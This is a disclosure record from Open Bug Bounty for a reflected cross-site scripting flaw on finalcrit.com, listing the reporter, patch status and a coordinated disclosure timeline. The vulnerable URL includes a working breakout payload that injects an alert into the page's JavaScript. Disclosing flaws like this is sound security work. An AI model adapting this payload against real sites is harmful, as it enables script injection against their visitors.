finalcrit.com XSS vulnerability

2016-07-03T16:38:00
ID OBB:163919
Type openbugbounty
Reporter 524Dart
Modified 2016-08-10T13:20:00

Description

Vulnerable URL:
http://finalcrit.com/bh.php?dm=homero.com.mx";}});alert('OPENBUGBOUNTY');(function z(){if(0){//
Details:

Description| Value
---|---
Patched:| Yes, at 09.08.2016
Latest check for patch:| 09.08.2016 19:59 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 28443945
VIP website status:| No
Check finalcrit.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 July, 2016 16:38 GMT
Generic security notifications sent to website owner| 3 July, 2016 16:41 GMT
Notification sent to subscribers (without technical details)| 3 July, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 9 August, 2016 19:59 GMT
Vulnerability patched by the website owner| 10 August, 2016 13:20 GMT